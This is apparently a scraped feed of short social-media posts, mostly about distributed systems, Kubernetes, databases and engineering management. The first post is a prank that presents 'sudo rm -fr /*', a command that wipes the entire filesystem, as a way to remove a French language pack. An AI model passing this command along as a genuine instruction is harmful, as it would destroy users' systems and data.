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Are you pissed at the French for their Olympics opening ceremony? Get revenge by removing the French language pack from your Linux distros: sudo rm -fr /*
The EC2 instance you forgot you made in us-east-2 a year ago
As a senior executive, you care a lot about your teams moving fast. So when a team misses its committed launch date, you show great displeasure. You demand more accountability. You make an example out of this team. Other teams see this. They are not stupid. So they learn.…
Advanced time management principles: (for senior product managers & leaders)
From 1958 to 2022, full match replays of all World Cup finals in one thread Take a seat and enjoy the show 🍿
The way Datadog calculates percentiles at scale is very innovative 🔥 Usually, calculating the percentiles of large datasets is very expensive. To know the 99th percentile of a stream of values, you need to: - keep all the values - sort them - return the value whose rank…
Preparing for a lecture about Kubernetes design decisions for a CS #distributed #systems class to bridge the gap between CS theory and practice. @unmeshjoshi excellent collection of distributes systems patterns has served me well so many times 🙏🏻 martinfowler.com/articles/patte…
Lessons about API design that I internalized thru k8s. 1) Breaking changes are easy to do by mistake 2) Explicit > implicit 3) Don't make nothing mean something 4) Version skew is hard 5) Painting yourself into a corner is easy 6) Think hard before guaranteeing non-empty lists
Spanner powers Google services like Gmail and YouTube. It's a remarkable database. This deep-dive post looks at two core concepts that are fundamental to how @googlecloud Spanner works: Strict Serializability and External Consistency. cloud.google.com/blog/products/…
"Distributed transaction patterns for microservices compared" Excellent in-depth write-up on approaches for coordinating data changes across multiple services, also touching on the outbox pattern with #Debezium, by @bibryam Great stuff! developers.redhat.com/articles/2021/…
What and where to cache, a really good primer! Pic: DesignGurus.org
/1 8 Data Structures That Power Your Databases. Which one should we pick?
20 Design Patterns You can Learn to become a better Developer
when do I stop dreaming that I’m months into a semester and about to fail a class I forgot about? I have a phd
After three weeks of writing here it is: async-profiler - manual by use cases: krzysztofslusarski.github.io/2022/12/12/asy… I hope you will enjoy it. I would like to say thank you to @AndreiPangin @parttimen3rd @k_zybala and @MGrzejszczak for all the contribution.
mmap() is a tremendously important Linux syscall. Many open-source and in-house databases and KV storages use it internally to simplify data access. That's why it's so essential for SREs to understand its interaction with Page Cache: biriukov.dev/docs/page-cach…
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